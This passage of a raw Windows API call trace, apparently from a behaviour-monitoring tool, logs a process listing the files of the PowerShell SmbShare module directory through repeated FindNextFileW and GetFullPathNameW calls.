dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_Net6to4Configuration.types.ps1xml", cAlternateFileName="")) returned 1 [0265.297] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad3c67, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfad3c67, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfad3c67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetDnsTransitionConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.316] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0265.316] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0265.316] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.316] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0265.316] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0265.317] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0265.317] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0265.317] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0265.317] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0265.317] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0265.317] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.318] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0265.318] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0265.318] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0265.318] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.318] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0265.318] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 0 [0265.319] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.319] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0265.319] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", lpFilePart=0x0) returned 0x3c [0265.319] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db080 [0265.319] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.319] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.320] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.format.ps1xml", cAlternateFileName="")) returned 1 [0265.320] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0265.320] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0265.320] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.320] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0265.320] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0265.320] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0265.321] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0265.321] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0265.321] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0265.321] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0265.321] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.321] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0265.321] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0265.322] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0265.322] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.322] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0265.322] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.322] FindClose (in: hFindFile=0x1a8db080 | out: hFindFile=0x1a8db080) returned 1 [0265.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.322] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0265.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.322] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.323] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0265.323] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", lpFilePart=0x0) returned 0x3c [0265.323] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.325] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, 